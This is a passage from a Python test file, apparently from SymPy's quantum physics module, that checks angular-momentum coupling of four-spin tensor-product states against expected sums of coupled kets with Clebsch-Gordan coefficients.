* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 6
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
)
)
== 2
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, S.Half)),
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
) == JzKetCoupled(
Rational(5, 2),
Rational(-5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
# Couple j1 to j2, j3 to j4
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
2, 2, (S(1) / 2, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== -JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 3
- sqrt(2)
* JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.One / 2), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
2, -2, (S(1) / 2, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
# j1=S.Half, S.Half, S.Half, 1
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== 2
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
